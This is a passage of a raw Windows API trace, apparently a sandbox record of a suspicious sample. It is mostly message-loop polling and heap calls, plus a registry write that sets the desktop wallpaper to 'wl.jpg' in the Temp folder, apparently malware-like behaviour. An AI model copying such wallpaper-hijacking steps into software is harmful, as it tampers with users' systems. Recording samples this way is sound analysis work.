wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0251.966] Sleep (dwMilliseconds=0xa) [0251.981] timeGetTime () returned 0x117edb2 [0251.982] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0251.982] Sleep (dwMilliseconds=0xa) [0251.998] timeGetTime () returned 0x117edc2 [0251.998] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0251.998] Sleep (dwMilliseconds=0xa) [0252.012] timeGetTime () returned 0x117edd1 [0252.012] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0252.012] Sleep (dwMilliseconds=0xa) [0252.029] timeGetTime () returned 0x117ede1 [0252.029] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0252.029] Sleep (dwMilliseconds=0xa) [0252.044] timeGetTime () returned 0x117edf1 [0252.044] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0252.044] Sleep (dwMilliseconds=0xa) [0252.068] timeGetTime () returned 0x117ee03 [0252.068] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0252.068] Sleep (dwMilliseconds=0xa) [0252.091] timeGetTime () returned 0x117ee20 [0252.091] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0252.091] Sleep (dwMilliseconds=0xa) [0252.107] timeGetTime () returned 0x117ee2f [0252.107] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0252.107] Sleep (dwMilliseconds=0xa) [0252.124] timeGetTime () returned 0x117ee3f [0252.124] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0252.124] Sleep (dwMilliseconds=0xa) [0252.137] timeGetTime () returned 0x117ee4e [0252.138] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0252.138] Sleep (dwMilliseconds=0xa) [0252.153] timeGetTime () returned 0x117ee5e [0252.153] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0252.153] Sleep (dwMilliseconds=0xa) [0252.169] timeGetTime () returned 0x117ee6e [0252.169] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0252.169] Sleep (dwMilliseconds=0xa) [0252.185] timeGetTime () returned 0x117ee7d [0252.185] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0252.185] Sleep (dwMilliseconds=0xa) [0252.200] timeGetTime () returned 0x117ee8d [0252.200] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0252.200] Sleep (dwMilliseconds=0xa) [0252.216] timeGetTime () returned 0x117ee9d [0252.216] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0252.216] Sleep (dwMilliseconds=0xa) [0252.231] timeGetTime () returned 0x117eeac [0252.231] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0252.231] Sleep (dwMilliseconds=0xa) [0252.247] timeGetTime () returned 0x117eebc [0252.247] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 1 [0252.250] TranslateMessage (lpMsg=0x8cf798) returned 0 [0252.250] DispatchMessageW (lpMsg=0x8cf798) returned 0x0 [0252.253] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0252.253] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0252.253] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0252.253] Sleep (dwMilliseconds=0xa) [0252.278] timeGetTime () returned 0x117eedb [0252.278] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0252.278] Sleep (dwMilliseconds=0xa) [0252.299] timeGetTime () returned 0x117eeeb [0252.299] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0252.299] Sleep (dwMilliseconds=0xa) [0252.326] timeGetTime () returned 0x117ef0b [0252.326] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0252.326] Sleep (dwMilliseconds=0xa) [0252.356] timeGetTime () returned 0x117ef29 [0252.356] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0252.356] Sleep (dwMilliseconds=0xa) [0252.373] timeGetTime () returned 0x117ef39 [0252.373] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0252.373] Sleep (dwMilliseconds=0xa) [0252.445] timeGetTime () returned 0x117ef77 [0252.445] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0252.445] Sleep (dwMilliseconds=0xa) [0252.466] timeGetTime () returned 0x117ef97 [0252.466] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0252.466] Sleep (dwMilliseconds=0xa) [0252.481] timeGetTime () returned 0x117efa6 [0252.483] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0252.487] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0252.487] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0252.487] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0252.487] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0252.487] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0252.487] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0252.488] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4b8 [0252.488] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0252.488] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0252.488] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0252.488] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0252.488] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0252.488] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0252.489] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0252.489] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0252.490] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0252.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0252.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0252.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab698 [0252.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0252.490] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0252.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab470 [0252.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0252.491] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf438 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0252.492] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4e8 [0252.492] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x50) returned 0x29eb058 [0252.492] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0252.492] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0252.492] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0252.492] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0252.492] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0252.492] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0252.492] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0252.493] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0252.493] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0252.493] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0252.493] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0252.493] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0252.493] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ea0 [0252.493] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0252.493] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xb0) returned 0x29f7878 [0252.493] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eb058 | out: hHeap=0x2af0000) returned 1 [0252.493] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0252.493] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ea0 | out: hHeap=0x2af0000) returned 1 [0252.493] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0252.493] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0252.494] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0252.494] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0252.494] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0252.494] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0252.494] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0252.494] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0252.494] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0252.494] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0252.495] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0252.496] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2a73290 [0252.496] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de40 | out: hHeap=0x2af0000) returned 1 [0252.496] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0252.497] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0252.498] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0252.498] CharUpperBuffW (in: lpsz="HKCU", cchLength=0x4 | out: lpsz="HKCU") returned 0x4 [0252.498] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0252.498] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0252.499] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0252.500] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0252.500] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0252.500] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0252.501] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Control Panel\\Desktop", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0x20006, lpSecurityAttributes=0x0, phkResult=0x8cf850, lpdwDisposition=0x8cf86c | out: phkResult=0x8cf850*=0x3c0, lpdwDisposition=0x8cf86c*=0x2) returned 0x0 [0252.501] RegSetValueExW (in: hKey=0x3c0, lpValueName="Wallpaper", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg", cbData=0x54 | out: lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg") returned 0x0 [0252.526] RegCloseKey (hKey=0x3c0) returned 0x0 [0252.526] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73290 | out: hHeap=0x2af0000) returned 1 [0252.526] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0252.526] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0252.526] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0252.526] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0252.526] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0252.526] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0252.526] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0252.526] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0252.526] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0252.526] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0252.526] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0252.526] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0252.527] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0252.527] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0252.527] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0252.527] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0252.527] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0252.527] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0252.527] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0252.527] CharUpperBuffW (in: lpsz="A0F00F04C39", cchLength=0xb | out: lpsz="A0F00F04C39") returned 0xb [0252.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0252.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0252.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0252.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a721d8 [0252.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0252.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0252.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0252.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0252.536] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72338 [0252.536] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0252.536] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0252.536] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0252.536] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0252.536] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0252.536] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0252.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0252.537] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0252.537] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0252.537] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0252.537] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0252.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab560 [0252.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0252.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0252.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0252.537] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0252.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0252.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0252.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0252.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0252.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0252.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0252.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0252.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0252.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0252.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab698 [0252.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab500 [0252.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0252.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0252.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0252.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0252.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0252.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0252.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0252.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0252.540] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0252.540] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0252.540] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0252.540] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0252.540] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab590 [0252.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab710 [0252.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0252.541] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0252.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0252.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0252.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0252.541] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0252.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0252.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0252.541] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0252.541] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0252.541] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0252.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0252.541] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0252.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0252.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0252.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0252.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0252.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0252.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0252.541] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0252.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0252.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0252.543] CharUpperBuffW (in: lpsz="SSA0F00F04C39", cchLength=0xd | out: lpsz="SSA0F00F04C39") returned 0xd [0252.544] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0252.544] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0252.544] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0252.544] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0252.544] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0252.545] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0252.545] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0252.545] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0252.545] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0252.545] HeapFree (in: 